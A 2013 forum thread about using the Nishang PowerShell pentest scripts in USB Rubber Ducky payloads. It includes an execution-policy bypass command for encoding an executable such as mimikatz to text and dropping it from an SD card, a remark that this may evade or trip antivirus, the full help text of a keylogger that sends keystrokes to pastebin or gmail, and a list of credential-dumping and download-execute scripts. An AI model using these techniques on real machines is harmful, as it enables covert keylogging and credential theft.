redmeatuk Posted July 2, 2013 Posted July 2, 2013 (edited) Hello all, Apologies in advance if this is old news to all. Anyone checked out Nishang ? It's a collection of handy Powershell scripts for penetration testing written by Nikhil Mittal which may come in handy for Ducky payloads -: https://code.google.com/p/nishang/ http://labofapenetrationtester.blogspot.co.uk/ I had a look at http://nishang.googlecode.com/svn/trunk/ExetoText.ps1 in particular and this uses a technique for encoding binaries to text, demonstrated here -: http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html You may need to run the following as administrator to bypass a powershell security policy which may prevent you from creating an executable file powershell.exe -executionpolicy bypass -file ExetoText.ps1 <payload.exe> <payload.txt> Where payload.exe is your executable e.g. mimikatz.exe and payload.txt is the encoded version of your exe file. If you were to place this encoded textfile and http://nishang.googlecode.com/svn/trunk/TexttoExe.ps1 on on your SD card if you're running twinduck firmware etc then you wouldn't need an Internet connection and download the file, you can just run this powershell script to convert the encoded text back to the exe. This may get flagged by AV so your mileage may vary. DarkOperator also has a nice python script and exe to generate base64 encoded powershell commands too -: http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html Cheers Aaron Edited July 2, 2013 by redmeatuk Quote
overwraith Posted July 3, 2013 Posted July 3, 2013 I think that somebody else suggested nishang also. If I can get some more time on my hands I would love to make ducky payloads using Nishang. The biggest problem is figuring out how all the tools in the project work. Are there any tutorials showing how they work? Quote
skysploit Posted July 3, 2013 Posted July 3, 2013 I was playing with Nishang when i came across this post... I cant wait to get this integrated with the simple-ducky. Quote
overwraith Posted July 6, 2013 Posted July 6, 2013 I downloaded Nishang, and cant figure out how to get the script's help file to show. I keep typing in the command, and the computer gives me an error. Basically what the error says is that the script file is not in powershell's help file. I don't want it to check powershell's help file though, I want it to check the current working directory. Here is the output: PS G:\nishang_0.2.7\nishang> Get-Help Keylogger.ps1 -full Get-Help : Get-Help could not find Keylogger.ps1 in a help file in this session. To download updated help topics type: "Update-Help". To get help online, search for the help topic in the TechNet library at http://go.microsoft.com/fwlink/?LinkID=107116. At line:1 char:1 + Get-Help Keylogger.ps1 -full + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [Get-Help], HelpNotFoundException + FullyQualifiedErrorId : HelpNotFound,Microsoft.PowerShell.Commands.GetHelpCommand PS G:\nishang_0.2.7\nishang> Quote
redmeatuk Posted July 6, 2013 Author Posted July 6, 2013 (edited) overwraith, Not really seen any tutorials for Nishang, there should be some examples on http://labofapenetrationtester.blogspot.com As for displaying the help for the powershell scripts try placing a .\ before the script it worked for me -: PS C:\Users\luser\Desktop\nishang> Get-Help .\Keylogger.ps1 -full NAME C:\Users\luser\Desktop\nishang\Keylogger.ps1 SYNOPSIS Nishang Payload which logs keys. SYNTAX C:\Users\luser\Desktop\nishang\Keylogger.ps1 [-dev_key] <String> [-username ] <String> [-password] <String> [-keyoutoption] <String> [-MagicString] <St ring> [-CheckURL] <String> [<CommonParameters>] DESCRIPTION This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory. The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. PARAMETERS -dev_key <String> The Unique API key provided by pastebin when you register a free accoun t. Unused for tinypaste. Unused for gmail option. Required? true Position? 1 Default value Accept pipeline input? false Accept wildcard characters? -username <String> Username for the pastebin account where data would be pasted. Username for the tinypaste account where data would be pasted. Username for the gmail account where attachment would be sent as an att achment. Required? true Position? 2 Default value Accept pipeline input? false Accept wildcard characters? -password <String> Password for the pastebin account where data would be pasted. Password for the tinypaste account where data would be pasted. Password for the gmail account where data would be sent. Required? true Position? 3 Default value Accept pipeline input? false Accept wildcard characters? -keyoutoption <String> The method you want to use for exfitration of data. "0" for displaying on console "1" for pastebin. "2" for gmail "3" for tinypaste Required? true Position? 4 Default value Accept pipeline input? false Accept wildcard characters? -MagicString <String> The string which when found at CheckURL will stop the keylogger. Required? true Position? 5 Default value Accept pipeline input? false Accept wildcard characters? -CheckURL <String> The URL which would contain the MagicString used to stop keylogging. Required? true Position? 6 Default value Accept pipeline input? false Accept wildcard characters? <CommonParameters> This cmdlet supports the common parameters: Verbose, Debug, ErrorAction, ErrorVariable, WarningAction, WarningVariable, OutBuffer and OutVariable. For more information, type, "get-help about_commonparameters". INPUTS OUTPUTS -------------------------- EXAMPLE 1 -------------------------- PS >.\Keylogger.ps1 3 <dev_key> <username> <pass> RELATED LINKS http://labofapenetrationtester.blogspot.com/ http://code.google.com/p/nishang Edited July 6, 2013 by redmeatuk Quote
overwraith Posted July 6, 2013 Posted July 6, 2013 I get this output. PS G:\nishang_0.2.7\nishang> dir Directory: G:\nishang_0.2.7\nishang Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 5/21/2013 2:19 PM 4993 Get-WLAN-Keys.ps1 -a--- 5/21/2013 2:24 PM 7936 Information_Gather.ps1 -a--- 11/21/2012 5:23 AM 5507 Invoke-Medusa.ps1 -a--- 11/21/2012 5:22 AM 4306 Invoke-PingSweep.ps1 -a--- 5/20/2013 10:02 AM 9328 Keylogger.ps1 -a--- 2/20/2013 1:22 PM 14114 Parse_Keys.ps1 -a--- 1/19/2013 9:14 PM 7690 Prasadhak.ps1 -a--- 2/13/2013 9:48 AM 2157 Remove-Update.ps1 -a--- 4/8/2013 2:12 PM 1340496 Run-EXEonRemote.ps1 -a--- 11/21/2012 7:46 AM 1056 Speak.ps1 -a--- 11/21/2012 7:46 AM 1228 StringToBase64.ps1 -a--- 11/21/2012 7:46 AM 1572 TexttoExe.ps1 -a--- 5/22/2013 2:10 AM 6171 Time_Execution.ps1 -a--- 5/21/2013 2:31 PM 13372 Wait_For_Command.ps1 -a--- 11/21/2012 7:44 AM 1994 Base64ToString.ps1 -a--- 11/21/2012 7:44 AM 1327 Browse_Accept_Applet.ps1 -a--- 6/10/2013 3:37 AM 2386 CHANGELOG.txt -a--- 5/1/2013 3:35 AM 12712 Check-VM.ps1 -a--- 4/8/2013 8:47 AM 3297 Create-MultipleSessions.ps1 -a--- 5/21/2013 2:19 PM 11890 Credentials.ps1 -a--- 5/23/2013 3:56 AM 19208 DNS_TXT_Pwnage.ps1 -a--- 6/10/2013 3:55 AM 849 Download-Execute-PS.ps1 -a--- 5/1/2013 3:33 AM 755 Download.ps1 -a--- 1/27/2013 10:38 PM 1800 Download_Execute.ps1 -a--- 1/31/2013 10:45 PM 5511 Enable-DuplicateToken.ps1 -a--- 11/27/2012 12:14 PM 3869 Execute-Command-MSSQL.ps1 -a--- 11/21/2012 7:45 AM 1524 ExetoText.ps1 -a--- 5/22/2013 3:22 AM 13069 Get-LSASecret.ps1 -a--- 5/22/2013 5:36 AM 22648 Get-PassHashes.ps1 -a--- 5/22/2013 9:20 AM 709 README.txt PS G:\nishang_0.2.7\nishang> Get-Help .\Keylogger.ps1 -full Get-Help : Get-Help could not find .\Keylogger.ps1 in a help file in this session. To download updated help topics type: "Update-Help". To get help online, search for the help topic in the TechNet library at http://go.microsoft.com/fwlink/?LinkID=107116. At line:1 char:1 + Get-Help .\Keylogger.ps1 -full + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [Get-Help], HelpNotFoundException + FullyQualifiedErrorId : HelpNotFound,Microsoft.PowerShell.Commands.GetHelpCommand PS G:\nishang_0.2.7\nishang> I haven't coded a day of powershell in my life though, so this is to be expected. Quote
no42 Posted July 6, 2013 Posted July 6, 2013 If you like Nishang, you will also like : https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.